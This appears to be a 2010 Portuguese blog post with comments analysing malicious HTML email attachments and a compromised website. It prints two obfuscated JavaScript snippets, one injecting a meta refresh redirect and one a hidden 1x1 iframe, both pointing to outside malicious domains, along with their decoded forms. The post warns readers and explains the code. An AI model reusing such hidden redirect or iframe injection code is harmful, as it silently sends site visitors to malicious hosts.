Jefferson, 
24 de setembro de 2010, 
Hoje eu recebi duas mensagens muito estranhas, que passaram pelo filtro do Gmail, com um anexo em HTML. Visualizando o anexo no Google Docs parecia perfeitamente “seguro”, mas eu sabia que se tratava de alguma pilantragem. Salvei o anexo no HDD e dei uma olhada no código fonte.
Entre uma frase e outra visível, isso estava escondido:
<script>if(frames){if(top.frames.length>0)top.location.href=self.location;}</script><script language=JavaScript>document.write(unescape(‘%3Cme%74a h%74tp%2Deq%75iv%3D%22r%65fr%65sh%22 co%6Ete%6Et%3D%220%3B%75rl%3Dht%74p%3A%2F%2Fg%72ad%75at%69on%6Fut%66it%74er%73%2Ec%6F%2Ez%61%2F1%2Eht%6Dl%22 %2F%3E%0D%0A%3Ct%61bl%65 wi%64th%3D%221%300%25%22 bo%72de%72%3D%22%30%22%3E%3Ctr %62gc%6Flo%72%3D%22%2355%3668%38%22 a%6Cig%6E%3D%22%63en%74er%22%3E%3C%74d%3E%3Ca h%72ef%3D%22h%74tp%3A%2F%2F%77ww%2Epu%6Cls%6Fft%2Eco%6D%2Fh%74ml%70ow%65r%2E%68tm%22%3E%3C%66on%74 fa%63e%3D%22Ar%69al%2C He%6Cve%74ic%61%2C s%61ns%2Dse%72if%22 co%6Cor%3D%22#%46FF%46FF%22 si%7Ae%3D%22%2D1%22%3ET%68is %57eb %50ag%65 wa%73 pr%6Fte%63te%64 by %48TM%4CPo%77er%2C Cl%69ck %68er%65 to %52eg%69st%65r%3C%2Ffo%6Et%3E%3C%2Fa%3E%3C%2F%74d%3E%3C%2Ft%72%3E%3C%2Fta%62le%3E%0D%0A’))</script>
Eu não tive paciência para decodificar tudo, mas se você tiver alguma noção de caracteres de escape e olhar com cuidado após “unescape” verá que isso começa injetando no browser “<meta http equiv refresh…”
Ou seja, é pilantragem mesmo. Não sei ainda o objetivo, mas até clicar em arquivos html está perigoso.
Liked by: Henzo M. F. Gomes, Roberto Acioli
Descobri como "ler" o que está escrito aí sem esforço. Basta colar o texto de unescape nesta página:
http://www.linkedresources.com/tools/unescaper_v0.2b1.html
E clicar em unescape. O resultado é este (não clique nos links!):
<meta http-equiv="refresh" content="0;url=http://graduationoutfitters.co.za/1.html" />
<table width="100%" border="0"><tr bgcolor="#556688" align="center"><td><a href="http://www.pullsoft.com/htmlpower.htm"><font face="Arial, Helvetica, sans-serif" color="#FFFFFF" size="-1">This Web Page was protected by HTMLPower, Click here to Register</font></a></td></tr></table>
O engraçado é que tudo dentro de <table> </table> parece ter sido inserido por acidente. Script-kiddie em ação?
Fazer seu browser dar um refresh e abrir "graduationoutfitters.co.za" (não clique!) é que é a parte perigosa da coisa.
eu recebi um email do google ferramentas para webmaster que um site meu bem antigo tinha sido infectado, e o código também estava desse jeito, veja:
<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%6F%64%66%65%72%2E%63%6F%6D%2F%3F%35%35%35%33%34%33%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script>
descriptografando fica assim:
<script>eval(unescape('document.write('<iframe src="http://podfer.com/?555343" width=1 height=1></iframe>')'));</script>
como ja foi dito: NÃO CLIQUEM NOS LINKS ^^